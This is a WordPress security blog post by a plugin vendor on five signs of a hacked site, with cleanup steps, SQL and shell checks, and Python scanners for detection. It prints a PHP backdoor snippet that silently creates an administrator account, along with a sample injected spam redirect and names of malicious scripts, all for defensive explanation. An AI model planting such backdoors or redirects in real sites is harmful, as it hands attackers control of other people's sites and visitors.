
5 Warning Signs Your WordPress Site Has Been Hacked

January 15, 2024 · WO Security Shield Team

Most WordPress hacks are silent. Attackers don't deface your site — they use it to send spam, serve malware to visitors, or mine crypto in the background. By the time you notice, the damage is done.

Here are the five warning signs you should never ignore.

1. Google is flagging your site as dangerous

If users see a red "This site may harm your computer" warning in Google Chrome, your site has been blacklisted. Google's Safe Browsing database flags sites that serve malware or phishing content.

What to do: Check Google Search Console under Security & Manual Actions. Use WO Security Shield to run an emergency malware scan.

2. Your hosting provider suspended your account

Hosts monitor for outbound spam, phishing pages, and malware distribution. If your account is suspended without explanation, it's almost always because automated scanners found something malicious.

What to do: Contact your host's abuse team for the specific files flagged. Don't just restore a backup — you need to find the entry point first, or you'll be hacked again within hours.

3. New admin accounts you didn't create

Log in to WordPress and go to Users → All Users. If you see admin-level accounts you don't recognise — especially with usernames like admin2, wpadmin, or random strings — your site has a backdoor.

What to do: Delete the rogue accounts immediately. Change all passwords. Then scan every PHP file for the code that created them — attackers often use PHP backdoors to create these accounts silently.

// Typical backdoor that creates admin accounts silently
$user_id = wp_create_user('hacker', 'password123', 'hacker@evil.com');
$user = new WP_User($user_id);
$user->set_role('administrator');

WO Security Shield detects this pattern and flags it as a critical finding.

4. Your site is redirecting visitors to spam pages

If visitors land on your home page and immediately get redirected to a pharma site, gambling site, or fake antivirus page — your site is infected with a redirect hack. These redirects are a form of SEO spam injection and are often injected into wp-config.php, functions.php, or index.php.

What to do: Check your site's core files against official WordPress checksums. Use the File Integrity Monitoring feature in WO Security Shield to spot every modified core file instantly.
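
What a core checksum comparison does, as an added example (not code from WO Security Shield or from this post). The manifest shape, a mapping of relative path to MD5, the helper names and the small demo tree are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile

# Core owns these directories outright, so an unlisted file in them is suspect.
CORE_ONLY_DIRS = ("wp-admin", "wp-includes")

def md5_of(path):
    with open(path, "rb") as handle:
        return hashlib.md5(handle.read()).hexdigest()

def verify_core(root, manifest):
    """Check a tree against {relative_path: md5}; return (modified, missing, unexpected)."""
    modified, missing, unexpected = [], [], []
    for rel, expected in manifest.items():
        if rel.startswith("wp-content/"):
            continue  # bundled themes and plugins are routinely removed or updated
        full = os.path.join(root, *rel.split("/"))
        if not os.path.isfile(full):
            missing.append(rel)
        elif md5_of(full) != expected:
            modified.append(rel)
    for top in CORE_ONLY_DIRS:
        for dirpath, _dirs, names in os.walk(os.path.join(root, top)):
            for name in names:
                rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
                if rel not in manifest:
                    unexpected.append(rel)
    return sorted(modified), sorted(missing), sorted(unexpected)

def build_demo_tree(root):
    """Write a tiny constructed stand-in for an install and return its manifest."""
    files = {"index.php": b"<?php // front controller\n",
             "wp-admin/admin.php": b"<?php // admin bootstrap\n",
             "wp-includes/version.php": b"<?php // version\n"}
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as handle:
            handle.write(data)
    return {rel: hashlib.md5(data).hexdigest() for rel, data in files.items()}

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        listing = build_demo_tree(demo_root)
        with open(os.path.join(demo_root, "index.php"), "ab") as handle:
            handle.write(b"// constructed stand-in for injected code\n")
        open(os.path.join(demo_root, "wp-includes", "class.wp.php"), "wb").close()
        print(verify_core(demo_root, listing))
```

wp-config.php and a third-party theme's functions.php are not part of the core release, so a clean result here does not clear them.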

5. Unknown files in your WordPress root or uploads folder

Files like mux-StateHelix.php, wp-tmp.php, class.wp.php, or random-named PHP scripts in /wp-content/uploads/ are almost always malware droppers or webshells — tools attackers use to maintain persistent access.

What to do: Delete them immediately. Then run a full scan to check whether they've been used to inject code elsewhere.
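
A scan for signs 3 and 5 together, as an added example (not WO Security Shield's detection logic): it flags PHP files under wp-content/uploads and files that both create a user and assign the administrator role. The patterns, file extensions, paths and sample sources are assumptions constructed for illustration.

```python
import os
import re

# A user-creating call plus an administrator role assignment in the same file.
CREATE_USER = re.compile(r"\bwp_(?:create|insert)_user\s*\(")
GRANT_ADMIN = re.compile(
    r"""(?:set_role|add_role)\s*\(\s*['"]administrator['"]"""
    r"""|['"]role['"]\s*=>\s*['"]administrator['"]""")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")

def load_php_sources(root):
    """Read every PHP-like file under root into {relative_path: source}."""
    sources = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(PHP_EXT):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, encoding="utf-8", errors="replace") as handle:
                    sources[rel] = handle.read()
    return sources

def scan_sources(sources):
    """Return sorted (relative_path, reason) findings."""
    findings = []
    for rel, source in sources.items():
        if rel.startswith("wp-content/uploads/"):
            findings.append((rel, "php-in-uploads"))  # uploads should hold media only
        if CREATE_USER.search(source) and GRANT_ADMIN.search(source):
            findings.append((rel, "creates-admin-user"))
    return sorted(findings)

# Constructed sample tree; the cache-helper entry holds the snippet quoted under sign 3.
SAMPLE = {
    "wp-content/themes/mytheme/functions.php": "<?php add_action('init', 'mytheme_setup');",
    "wp-content/plugins/cache-helper/init.php": (
        "<?php $user_id = wp_create_user('hacker', 'password123', 'hacker@evil.com');\n"
        "$user = new WP_User($user_id);\n$user->set_role('administrator');"),
    "wp-content/plugins/signup/register.php": "<?php wp_create_user($login, $pass, $email);",
    "wp-content/uploads/2024/01/wp-tmp.php": "<?php // constructed placeholder",
}

if __name__ == "__main__":
    for rel, reason in scan_sources(SAMPLE):
        print(reason, rel)
```

Treat a hit as a lead to review: installers and membership plugins legitimately create administrators, and obfuscated code will not match these literal patterns.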


The fastest way to confirm a hack

Install WO Security Shield and run a full integrity scan. It will:

  • Compare every core file against official WordPress checksums
  • Detect PHP backdoors and webshells by signature
  • Flag suspicious files in locations they should never exist
  • Check your database for injected scripts

A complete scan takes under 2 minutes. If your site is clean, you'll know. If it's not, you'll have an exact list of what to fix.

Don't wait. The longer malware stays on your server, the more visitors it affects — and the harder it is to recover your search rankings. If the scan confirms a hack, follow our step-by-step guide to cleaning a hacked WordPress site.

What to Do When You Spot These Warning Signs

Recognising the signs is step one. Here's exactly what to do for each one.

If you see unexpected redirects

Immediate action:

  1. Open your site in an incognito/private browser window (to see what logged-out visitors see)
  2. Try accessing from a mobile device (some redirects only target mobile users)
  3. Check your .htaccess file for injected redirect rules:
# View .htaccess — look for RewriteRule lines you didn't add
cat .htaccess

# Also check .htaccess files in subdirectories
find . -name ".htaccess" -type f
  4. Check your WordPress options for modified URLs:
SELECT option_value FROM wp_options WHERE option_name IN ('siteurl', 'home');
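
Reading .htaccess by eye gets slow when there are many files, so here is an added example (not from the original post or the plugin) that lists redirect rules pointing at a host other than your own, together with the RewriteCond lines that gate them. The function name, the `site_host` parameter and the sample file are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

DIRECTIVE = re.compile(
    r"^\s*(RewriteCond|RewriteRule|Redirect(?:Match|Permanent|Temp)?)\s+(.*)$", re.I)

def audit_htaccess(text, site_host):
    """Return findings for rules that send visitors to a host other than site_host."""
    site = site_host.lower()
    findings, pending = [], []
    for number, line in enumerate(text.splitlines(), start=1):
        match = DIRECTIVE.match(line)
        if not match:
            continue
        name, rest = match.group(1).lower(), match.group(2)
        if name == "rewritecond":
            pending.append(rest)  # conditions apply to the next RewriteRule
            continue
        conds, pending = (pending, []) if name == "rewriterule" else ([], pending)
        for token in rest.split():
            # %{...} is a server variable (the usual force-HTTPS rule), not a fixed host
            if not re.match(r"(?i)https?://", token) or "%{" in token:
                continue
            host = (urlsplit(token).hostname or "").lower()
            if host and host != site and not host.endswith("." + site):
                findings.append({"line": number, "host": host, "conditions": conds})
    return findings

# Constructed sample: a WordPress rewrite block, a force-HTTPS rule, and one injected rule.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteCond %{HTTPS} off
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
RewriteCond %{HTTP_USER_AGENT} (android|iphone) [NC]
RewriteRule ^(.*)$ http://spam.example/landing [R=302,L]"""

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, "yourdomain.com"):
        print(finding)
```

The user-agent condition on the flagged rule is why the redirect only shows up on a mobile device, as step 2 describes.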

If Google Search Console shows security issues

Immediate action:

  1. Read the specific issue description — Google tells you what it found
  2. Use the URL Inspection tool to see the infected pages as Google sees them
  3. Don't dismiss the warning without investigating — Google's detection is accurate
  4. After cleanup, go to Security Issues → Request a Review

Google typically removes the warning within 1-2 weeks after a successful review.

If your site is suddenly slow

Immediate action:

  1. Open browser DevTools (F12) → Performance tab → check CPU usage
  2. Look for unknown external scripts in the Network tab:
❌ coinhive.min.js — cryptocurrency miner
❌ evil-domain.com/track.js — malicious tracker
❌ cdn.jquery-analytics.com/analytics.js — fake analytics (malware)
  3. Check your site's source code for injected scripts:
grep -r "script src" wp-content/themes/your-theme/header.php
grep -r "script src" wp-content/themes/your-theme/footer.php

If you find unknown admin users

Immediate action:

  1. Do NOT just delete the account — first document it (screenshot the user profile, note the email and registration date)
  2. Change passwords for ALL legitimate admin accounts immediately
  3. Then delete the rogue account
  4. Check for backdoors — rogue admin accounts are often created alongside file-based backdoors
  5. Review your activity log for actions taken by the rogue account

If you notice unfamiliar content or pages

Immediate action:

  1. Search your database for injected content:
-- Parentheses keep the publish filter applied to all three patterns
SELECT ID, post_title FROM wp_posts
WHERE post_status = 'publish'
AND (post_title LIKE '%pharma%'
   OR post_title LIKE '%casino%'
   OR post_content LIKE '%display:none%')
ORDER BY post_date DESC
LIMIT 20;
  2. Check for injected pages that don't show in your WordPress admin by searching Google for:
site:yourdomain.com

Compare Google's index against your actual pages.

The First 60 Minutes After Discovering a Hack

Time matters. Here's your emergency response checklist:

Minutes 0–15: Contain the damage

  • Change your WordPress admin password
  • Change your hosting/cPanel password
  • If you have a backup, note when it's from (you may need it)
  • Put the site in maintenance mode if customers are at risk

Minutes 15–30: Assess the scope

  • Run a security scan (WO Security Shield, or manually check files)
  • Check Google Search Console for flagged issues
  • Review your activity log for the entry point
  • Check for rogue admin accounts

Minutes 30–60: Begin cleanup

  • Remove identified malware and backdoors
  • Replace modified core files with clean versions
  • Update all plugins, themes, and WordPress core
  • Enable 2FA on all admin accounts

After cleanup:

  • Submit security review to Google (if flagged)
  • Monitor file integrity for reinfection attempts
  • Review and improve your security measures
  • Document the incident for future reference

Why Prevention Beats Detection

Every hour your site stays infected costs you:

  • Lost revenue — visitors see warnings or get redirected away
  • SEO damage — Google downgrades hacked sites in search results
  • Trust erosion — customers who encounter malware warnings may never return
  • Cleanup costs — professional malware removal ranges from $150 to $500

A WordPress security plugin with a firewall, 2FA, and file monitoring costs a fraction of one cleanup. The math is straightforward: prevention is always cheaper than recovery.
